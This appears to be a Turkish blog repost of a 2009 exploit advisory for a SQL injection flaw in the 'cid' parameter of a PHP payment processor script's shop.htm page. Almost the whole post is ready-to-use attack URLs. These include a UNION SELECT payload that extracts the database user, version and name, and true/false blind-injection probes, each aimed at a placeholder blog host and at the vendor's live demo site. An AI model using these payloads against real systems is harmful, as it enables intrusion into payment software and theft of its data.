Payment Processor Script (shop.htm cid) SQL Injection Vulnerability

4 Ağustos 2009 Salı

Payment Processor Script (shop.htm cid) SQL Injection Vulnerability

kaynak: http://www.milw0rm.com/exploits/9351

kaynak: http://www.yildirimordulari.com/showthread.php?t=10303



R-Sql

http://z0rlu.blogspot.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

B-Sql

http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=1    true

http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=100  false

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=1

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=100

ZoRLu | ZRL | Buffer Overflow

4 Ağustos 2009 Salı

Payment Processor Script (shop.htm cid) SQL Injection Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com